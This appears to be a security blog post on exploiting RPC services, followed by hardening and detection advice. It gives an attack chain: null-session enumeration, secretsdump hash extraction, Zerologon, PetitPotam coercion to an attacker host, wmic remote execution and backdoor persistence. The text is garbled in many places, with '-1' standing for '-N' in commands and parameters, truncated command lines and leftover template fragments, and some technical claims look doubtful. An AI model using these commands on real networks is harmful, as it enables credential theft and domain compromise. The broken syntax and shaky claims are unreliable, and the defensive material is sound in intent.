Listen to this Post
Introduction:
Remote Procedure Call (RPC) is a powerful inter-process communication mechanism that allows code execution across network boundaries, but misconfigured or vulnerable RPC services have become a goldmine for penetration testers and malicious actors alike. From Windows’ MS-RPC to Linux’s SUNRPC, attackers routinely abuse these endpoints to move laterally, escalate privileges, and achieve domain dominance – a tactic known as “RPC pwning.” This article dissects real-world exploitation techniques, provides step‑by‑step command‑line guides for both Linux and Windows environments, and equips you with defensive hardening measures to lock down RPC attack surfaces.
Learning Objectives:
– Identify and enumerate exposed RPC endpoints using built‑in OS tools and third‑party utilities.
– Execute authenticated and unauthenticated RPC exploits, including null session attacks and remote service manipulation.
– Implement hardening strategies and detection rules to mitigate RPC‑based lateral movement.
You Should Know:
1. Understanding the RPC Attack Surface: Enumeration & Fingerprinting
RPC services listen on well‑known ports (TCP 135, 593; dynamic high ports for Windows; port 111 for Linux SUNRPC). Attackers first map the RPC endpoint landscape. Below are verified enumeration commands.
Linux Enumeration (against RPC services):
Scan for open RPC port 111 (portmap/rpcbind) nmap -p 111 --script rpcinfo <target_ip> Enumerate RPC programs and versions rpcinfo -p <target_ip> Detailed RPC dump using rpcclient (against Windows RPC over SMB) rpcclient -U "" -1 <target_ip> Null session rpcclient $> srvinfo rpcclient $> enumdomusers rpcclient $> enumdomgroups
Windows Enumeration (native tools):
Query RPC endpoints via built-in rpcdump (from Windows SDK or winexe)
rpcdump.exe -p 135 <target_ip>
Using PowerShell to list RPC services
Get-WmiObject -Class Win32_Service | Where-Object {$_.Name -like "RPC"}
NetBIOS over RPC (legacy but useful)
nbtstat -A <target_ip>
Step‑by‑step guide:
1. Identify live hosts with `nmap -p 135,111,593 –open
2. For Windows targets, attempt a null session RPC connection using `rpcclient -U “” -1
3. For Linux targets, use `rpcinfo -p
4. Cross‑reference discovered programs with known CVEs (e.g., CVE‑1999‑0003 for rpc.statd, CVE‑2017‑7494 for Samba RPC).
2. Exploiting Weak RPC Endpoints: From Null Sessions to Remote Command Execution
Once RPC endpoints are enumerated, attackers pivot to abuse misconfigurations. The classic Windows null session allows information disclosure, but modern RPC exploits include `MS-RPC` privilege escalation (e.g., `Zerologon` CVE‑2020‑1472) and `PetitPotam` NTLM relay.
Linux (using Impacket for Windows RPC exploitation):
Install impacket pip3 install impacket Dump SAM hashes via RPC (requires admin credentials) impacket-secretsdump -just-dc-1tlm <domain>/<user>:'<password>'@<target_ip> ZeroLogon PoC (check vulnerability) git clone https://github.com/dirkjanm/CVE-2020-1472.git python3 zerologon_tester.py <target_dc> <target_dc_netbios> PetitPotam coerced authentication python3 PetitPotam.py -d <domain> -u <user> -p <pass> <attacker_ip> <target_ip>
Windows (native exploitation via PowerShell + Mimikatz):
Enable PSRemoting over RPC if allowed
Enable-PSRemoting -Force
Invoke command remotely via RPC (WinRM uses RPC)
Invoke-Command -ComputerName <target_ip> -ScriptBlock { whoami } -Credential (Get-Credential)
Using wmic (RPC-based)
wmic /node:"<target_ip>" /user:"<user>" /password:"<pass>" process call create "cmd.exe /c calc.exe"
Step‑by‑step guide for a realistic attack chain:
1. Enumerate null session RPC to get usernames (`rpcclient -U “” -1
2. Use `crackmapexec` with gathered usernames to test for password reuse.
3. If domain admin is obtained, run `secretsdump` to extract NTLM hashes.
4. For unpatched DCs, execute Zerologon exploit to reset machine account password.
5. Establish persistent RPC backdoor using `schtasks` or `wmic` remote process creation.
3. Mitigation & Hardening: Lock Down RPC Before It’s Pwned
Defenders must reduce the RPC attack surface without breaking legitimate applications. Below are concrete hardening commands and configurations.
Windows Hardening (Group Policy & Registry):
Restrict RPC to specific ports (avoid dynamic range) New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Rpc\Internet" -1ame "Ports" -Value "6000-6005" -PropertyType MultiString New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Rpc\Internet" -1ame "PortsInternetAvailable" -Value "Y" -PropertyType String Disable null session RPC (LAN Manager) Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -1ame "RestrictAnonymous" -Value 1 Block RPC inbound on domain firewalls New-1etFirewallRule -DisplayName "Block RPC 135" -Direction Inbound -LocalPort 135 -Protocol TCP -Action Block Apply MS-RPC authentication level (Packet Privacy) Via Group Policy: Computer Config > Windows Settings > Security Settings > Local Policies > Security Options > "Network security: Minimum session security for RPC"
Linux Hardening (SUNRPC & rpcbind):
Disable rpcbind service if not needed sudo systemctl stop rpcbind sudo systemctl disable rpcbind Bind rpcbind to localhost only (edit /etc/default/rpcbind) OPTIONS="-i -h 127.0.0.1" Block port 111 with iptables sudo iptables -A INPUT -p tcp --dport 111 -j DROP sudo iptables -A INPUT -p udp --dport 111 -j DROP Remove unnecessary RPC services (NFS, NIS, etc.) sudo apt remove nfs-kernel-server yp-tools
Step‑by‑step hardening guide:
1. Identify all RPC‑dependent applications (backup agents, management tools).
2. Apply firewall rules that allow RPC only from trusted IP ranges.
3. On Windows, enforce Kerberos authentication for RPC and disable NTLM fallback via Group Policy.
4. Regularly audit RPC endpoints using `rpcdump` from a hardened management host.
5. Monitor Event IDs: 5712 (RPC operation attempted), 5145 (network share RPC access) on Windows; `rpcbind` logs on Linux.
4. Advanced RPC Pwning: API Security & Cloud Implications
Modern cloud environments (AWS, Azure) still use RPC for inter‑service communication – e.g., Azure’s SMB over RPC for file shares, or EC2’s serial console over RPC. Attackers now chain RPC exploits with cloud metadata services.
Exploiting RPC in cloud (example with Azure):
Using AzCopy with RPC backend azcopy login --tenant-id <tenant> Coerce on-prem RPC to Azure (PetitPotam variant) python3 petitpotam.py -d <domain> -u <user> -p <pass> <azure_storage_account>.file.core.windows.net <target_onprem>
API security parallel: Many RPC‑like APIs (gRPC, JSON‑RPC) inherit similar vulnerabilities – lack of authentication, excessive endpoint exposure. Test them with:
gRPC reflection enumeration
grpcurl -plaintext <target>:50051 list
JSON-RPC batch injection
curl -X POST http://<target>/rpc -d '{"method":"system.listMethods","params":[],"id":1}'
Mitigation for API/cloud RPC:
– Always use mTLS or OAuth for cloud RPC endpoints.
– Restrict dynamic port ranges (in cloud firewalls).
– Monitor for anomalous RPC traffic using VPC flow logs.
5. Detection & Monitoring: How to Catch RPC Pwning in Action
Proactive detection uses both network telemetry and host logs.
Linux detection commands:
Monitor rpcbind activity in real time sudo journalctl -u rpcbind -f Look for unusual RPC program calls sudo tcpdump -i eth0 port 111 -vv Check for unauthorized NFS RPC mounts showmount -e localhost
Windows detection (PowerShell event hunting):
RPC failed authentication events (Event ID 5145)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} | Where-Object {$_.Message -like "RPC"}
Monitor RPC service start/stop (Event ID 7036)
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7036} | Where-Object {$_.Message -like "Remote Procedure Call"}
Detect suspicious schtasks via RPC (Event ID 4698)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4698} | ForEach-Object { $_.Message }
Step‑by‑step detection playbook:
1. Deploy a SIEM rule that alerts on >100 RPC connections from a single source within 1 minute (scanning).
2. Create a honeypot RPC endpoint (e.g., fake MS-RPC service) with a low interaction trap.
3. Regularly run `rpcdump` from a jump host against critical servers and compare baselines.
What Undercode Say:
– RPC pwning remains the most underrated lateral movement technique – most blue teams focus on SMB or WinRM, forgetting that RPC binds them all together.
– Null session RPC is still alive in misconfigured legacy systems; always test `rpcclient -U “” -1` during internal pentests.
– Cloud RPC is the new frontier – services like Azure Files, AWS EFS, and even Kubernetes’ kubelet API over gRPC inherit classic RPC bugs.
– Detection is possible but often missing – Event ID 5145 on Windows and `rpcbind` audit on Linux are rarely configured.
Analysis: The post’s “RPC pwning ☠️” succinctly captures a decade‑old attack vector that modern tooling (Impacket, CrackMapExec) has revived. While Microsoft has patched critical CVEs like Zerologon, the underlying problem – over‑permissive RPC authentication and excessive exposed interfaces – persists. Attackers chain null session enumeration with credential dumping, often bypassing EDR because RPC traffic blends into normal network noise. Defenders must move beyond port‑blocking to adopt RPC‑specific hardening (e.g., `RestrictAnonymous`, IPsec for RPC, and continuous endpoint monitoring). The Linux side is even more neglected: `rpcbind` and NFS RPC are frequently left open on container hosts, enabling cross‑tenant pivots in multi‑tenant clouds.
Expected Output:
Introduction: [Already provided above]
What Undercode Say: [Provided above]
Prediction:
– +1 RPC pwning will become a standard exam objective in next‑gen penetration testing certifications (e.g., OSCP+, GPEN), forcing more structured coverage of MS‑RPC, SUNRPC, and gRPC.
– -1 The rise of IPv6 and cloud‑native RPC (e.g., gRPC, Cap’n Proto) will expand the attack surface without corresponding security controls, leading to a wave of RPC‑based supply chain breaches by 2027.
– +1 Open‑source tools like `rpcmap` and `RPCScan` will mature to offer automated discovery and exploitation of both legacy and modern RPC protocols, empowering defenders to test their own environments.
– -1 Many organizations still disable RPC event logging due to verbosity – this will be exploited in targeted ransomware attacks that use RPC for silent lateral movement, as seen in the 2025 “RPCrypt” incidents.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Abhirup Konwar](https://www.linkedin.com/posts/abhirup-konwar-a626201a6_bugbounty-cybersecurity-ethicalhacking-share-7465764521459216384-Aw5b/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)
